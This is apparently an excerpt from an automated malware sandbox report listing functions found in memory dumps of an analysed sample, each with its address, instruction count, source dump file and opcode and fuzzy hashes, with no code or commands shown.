                                Function 00007FFD9B6B0C50 Relevance: .0, Instructions: 41COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7cffea0ebb73702e9a50351d60e6c35e0b94424f83e0393f5bc02e94d7cf6120
                                • Instruction ID: 47dea7d49e1344e0da44936884fed2a8b26e2a861266d3ec76ad279f26e4c649
                                • Opcode Fuzzy Hash: 7cffea0ebb73702e9a50351d60e6c35e0b94424f83e0393f5bc02e94d7cf6120
                                • Instruction Fuzzy Hash: 41015E35A0E38D8EEB129BA5886419D7FB0AF02710F1545E7C455DB1A6DB386A44CB41
                                Function 00007FFD9B9D67BF Relevance: .0, Instructions: 41COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9030c6b37182a32bc44ea265ed72d7ad340faa1e4ea1624a14f51d47eb486c9c
                                • Instruction ID: 56f8203c9abc17d2a879b7070c9264f495493c8fdfa537d2d1b95d55716af5e4
                                • Opcode Fuzzy Hash: 9030c6b37182a32bc44ea265ed72d7ad340faa1e4ea1624a14f51d47eb486c9c
                                • Instruction Fuzzy Hash: A6F0543271CB488FDB5CDA1CF4519B973D1EBD5335F10062EF08BC66E6DA26E8428645
                                Function 00007FFD9B6B578D Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 68a2ca42a04399e4d56ceb948eb9f056317c95167f09edb27798a016f72571fd
                                • Instruction ID: 45fb646043e6104bf7fa8a9bb233f53986e159c1e1b9c16624cac47a1cef4e83
                                • Opcode Fuzzy Hash: 68a2ca42a04399e4d56ceb948eb9f056317c95167f09edb27798a016f72571fd
                                • Instruction Fuzzy Hash: A0F01230E1D42D9EEB64AA94D871AF877B1EB54311F1100B9D45EDB1B2ED287A818E41
                                Function 00007FFD9B9DA164 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0735a002b9415c31ba0ffffb2d2f03e8c039a70719d8cb017a6b69f606364acc
                                • Instruction ID: 99b193ca442b9d25a20d681165e981fcf44f32a6458c6fb1a23fd30a5a05b95c
                                • Opcode Fuzzy Hash: 0735a002b9415c31ba0ffffb2d2f03e8c039a70719d8cb017a6b69f606364acc
                                • Instruction Fuzzy Hash: BB01A23462D68E5FDB65DF44C8606A93BA2FF85300F4441ADF829872D1CA355924C701
                                Function 00007FFD9B6B2DBF Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c3d4c4886949a190a79c7e50fa34cfd96fecd7541ee5a57354fc1c23d9a38afe
                                • Instruction ID: e932a6b7eeb2d98e68590c1669f4432629cf0498f175da4e9efbb819375f4fd7
                                • Opcode Fuzzy Hash: c3d4c4886949a190a79c7e50fa34cfd96fecd7541ee5a57354fc1c23d9a38afe
                                • Instruction Fuzzy Hash: FEF0FF35A1892CCFDB54EF48C895E99B7F2FBA8315F01426AD40AE7261CA34F944CB81
                                Function 00007FFD9B9D816D Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3c784913bfe58e7276b4f4f6a63b07d8d9d74fbd0e928c7c5d333082e4c833fc
                                • Instruction ID: 8fe4929744962888f6ac883eefca233b962d3490b3d111716725e17eb0b516f9
                                • Opcode Fuzzy Hash: 3c784913bfe58e7276b4f4f6a63b07d8d9d74fbd0e928c7c5d333082e4c833fc
                                • Instruction Fuzzy Hash: 85E09A2171AA0C4FC2A09A8DA8903B873C1EBC8320F4446BBE40DCB36AC8289D058781
                                Function 00007FFD9B6B6E8D Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 24a01a7ce74f8aaa61528480518e5bccf005ff3cd99fb2a6184fa6389445a748
                                • Instruction ID: 4e897a25751f4dee15bf06b1fdbcdbbbc30f2a019ee571d33cfa21cfe012cdf2
                                • Opcode Fuzzy Hash: 24a01a7ce74f8aaa61528480518e5bccf005ff3cd99fb2a6184fa6389445a748
                                • Instruction Fuzzy Hash: CAE01221F0D52A4BF764A245D8A03B96271EF54300F2510B8E95ED73D2DD38BF418E06
                                Function 00007FFD9B6B0B9D Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd239396f3827d2732a21e0b430b27498b40a1a26ec5b2d65818e2d756ffd5e7
                                • Instruction ID: b778872abe4dd6c003f5e50af47e37564ab2b6a8a859d04b8949f8c489a64388
                                • Opcode Fuzzy Hash: bd239396f3827d2732a21e0b430b27498b40a1a26ec5b2d65818e2d756ffd5e7
                                • Instruction Fuzzy Hash: EAC0123061980E8FDA40B738C88481477A0FB0E201BD504D0E01DC71A1D61598508700
                                Function 00007FFD9B6B06AD Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad998fa7ec527a0f91f3211fddc193c16116d8326c3330cdb751e7fa6e87bfbc
                                • Instruction ID: cfe4c7fd351c8389015a75f27ed0330adeb338cbd86f3a1bab9322af33f301c6
                                • Opcode Fuzzy Hash: ad998fa7ec527a0f91f3211fddc193c16116d8326c3330cdb751e7fa6e87bfbc
                                • Instruction Fuzzy Hash: 7EC08C04F1F67F00E83031EF18220ADA9208BC4A20FD71032D22C480B1BC0D32C60A56
                                Function 00007FFD9B6B12C8 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2dec2f853035a89571f053a87a076d55b4fdeaefba3b088ab0f39afa83c1b0ba
                                • Instruction ID: 4b1056039d4bf37ae9491f1a93ced9c976a9e85a91d88818837e6aeed5009a56
                                • Opcode Fuzzy Hash: 2dec2f853035a89571f053a87a076d55b4fdeaefba3b088ab0f39afa83c1b0ba
                                • Instruction Fuzzy Hash: D6C08C3052180C8FC918FB28C89480433B0FB09200BC20090E008CB170D619ECC0CB40
                                Function 00007FFD9B6B2E04 Relevance: .0, Instructions: 9COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2d56886626af49e09861ad1beb01853957c9efaf0808b47bc7c0b9dfcaf14479
                                • Instruction ID: 1b6c41f3823bc8bf25f63ab411618d5b7a22aaec1169744f95a89729bcf70743
                                • Opcode Fuzzy Hash: 2d56886626af49e09861ad1beb01853957c9efaf0808b47bc7c0b9dfcaf14479
                                • Instruction Fuzzy Hash: A4C04015F1E43E8BE174665541716B921616F44300F560435D43E9B1F2DD1C3E005EC1
                                Function 00007FFD9B6B06D0 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 894981575ae4885f37e7db4e6281a4c2f5914478cf8912c33382c8a98f5073f7
                                • Instruction ID: 87754ab1a29f9d05dc8387c73966bea2776b3c96f1e5173a2bcf5d77ba8be6f0
                                • Opcode Fuzzy Hash: 894981575ae4885f37e7db4e6281a4c2f5914478cf8912c33382c8a98f5073f7
                                • Instruction Fuzzy Hash: D3B01204D5F46F00E42431FB08630657460DB84100FCA1070E51C44091984D32D40752
                                Function 00007FFD9B6B1C62 Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f5e26e09ceff8f117bbeb17d1952900e833dd223335cdfcf92ab1628463cebe6
                                • Instruction ID: 1d97157514af2d4f506035734bcf6044661c2fe5d4ad94eb6c553c458ca72db1
                                • Opcode Fuzzy Hash: f5e26e09ceff8f117bbeb17d1952900e833dd223335cdfcf92ab1628463cebe6
                                • Instruction Fuzzy Hash: 3EB09212E2D62E42E32492A284601BA25210F48310F6A8036801A5E0A29E3C76069980